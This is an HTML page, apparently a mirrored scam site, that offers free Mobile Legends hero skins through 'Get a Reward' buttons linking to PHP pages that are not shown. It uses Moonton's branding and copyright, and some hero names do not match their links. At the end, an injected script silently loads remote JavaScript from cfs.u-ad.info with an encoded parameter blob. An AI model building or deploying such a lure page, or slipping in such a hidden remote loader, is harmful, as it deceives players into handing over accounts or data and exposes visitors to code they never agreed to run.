<!DOCTYPE html>
<html lang="th">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Mobile Legends - Event</title>
    <meta name="description" content="Best Event Mobile Legends">

    <!-- <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/flat-ui.min.css" rel="stylesheet">
    <link href="css/main.css" rel="stylesheet"> -->
    <link href="css/pb.min.css" rel="stylesheet">

    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>
    <div id="fb-root"></div>
    <script>(function(d, s, id) {
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) return;
      js = d.createElement(s); js.id = id;
      js.src = "../connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=661774673967000";
      fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));</script>

    <div class="container">
      <div class="row">
        <div class="center">
          <h1>
            Great Event Mobile Legends<br>
            Choose a Skin To Have
          </h1>
        </div>

        <div class="clearfix"></div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="https://i.ytimg.com/vi/NLPsbeSdbz4/maxresdefault.jpg" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>MOSKOV</b>
                <br>
                <span class="underline">Snake Eye Commander</span>
                <br>
              </p>
              <a href="moskov.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>
		  
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="https://d1x91p7vw3vuq8.cloudfront.net/20170523/5923c08fabf1d.jpg"alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>ZILONG</b>
                <br>
                <span class="underline">Dragon Knight</span>
                <br>
              </p>
              <a href="zilong.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>
		  
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="https://i.ytimg.com/vi/YkVjENBzGG8/maxresdefault.jpg" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>FRANCO</b>
                <br>
                <span class="underline">Apocalypse</span>
                <br>
              </p>
              <a href="franco.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>
		  
		  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="https://i.ytimg.com/vi/DmwjoaNMzoc/maxresdefault.jpg" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>RUBY</b>
                <br>
                <span class="underline">Hidden Orchid Butterfly</span>
                <br>
              </p>
              <a href="miya.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>
		  
		  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="https://www.revivaltv.id/wp-content/uploads/2017/06/Storm.png" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>SABER</b>
                <br>
                <span class="underline">Codename - Storm</span>
                <br>
              </p>
              <a href="saber.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>
		  
		                    <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="https://i.ytimg.com/vi/9ykXvXZ9V-8/maxresdefault.jpg" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>ALUCARD</b>
                <br>
                <span class="underline">Child of the Fall</span>
                <br>
              </p>
              <a href="alucard.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>
		  
		  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="http://images2.itechpost.com/data/images/full/87688/mobile-legends-estes-abilities-revealed.png" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>ESTES</b>
                <br>
                <span class="underline">Holly Sacrifice</span>
                <br>
              </p>
              <a href="layla.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>
		  
		  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="https://i.ytimg.com/vi/8Z9oVlokhq8/maxresdefault.jpg" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>ALPHA</b>
                <br>
                <span class="underline">Onimusha Commander</span>
                <br>
              </p>
              <a href="freya.php" class="btn btn-success btn-embossed btn-block">Get a Reward</a>
            </div>
          </div>

        <div class="clearfix"></div>
        <div class="center">
    </div>

        <div class="clearfix"></div>
        <div class="center">
    </div>

    <footer class="footer">
      <div class="container">
Copyright &copy; 2017 Mobile Legends. All rights reserved.<br>
 Powered by Moonton. Trademarks belong to their respective owners. All rights reserved. 
      </div>
    </footer>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bK1PafbffoAyw5SWLbL9eVLW16LAf%2fo%2b76MlVjMjbnGcvkYXsNUk5thfbyBOD4jNUyeXe9aHKH4fjWgzggU0IABrwbUCHq04sFK9LHL9vZGk1qSfbQAok8NzObOPB4y6pEMd%2fUVuFDCURKExWS5%2faCTAkbLszq7%2bYDvNNYQnS%2f8w8GhblmgpxLZrMqI%2fLAcJnl%2bzBl2dcoP8EbcGPL5Ur8RrRhnrASc1hSZh2vgENhX3ctuLaDa%2bhL5L0JA4iJ4rQSdNjGzOpNzt5slRGMR6%2bxMorzcjvNL3wMxqxzninY1NM99%2f7Fe4MUCi6t693EJMYZCVa4gtY0sPvgzznR3TZqvfjRXX6kk4GZOCuWGYAu2%2b4QE4dGrsyVrXvNhT7fSkDAFyRTPv0nCoHVscWjLTZgSX%2fH%2fXjS2vVVWEHvu2fEPUSE%2bOEvCuJHNbEJ763Guf1QCc25Pfmz4M%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from www.garenaweb.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Dec 2015 03:50:33 GMT -->
</html>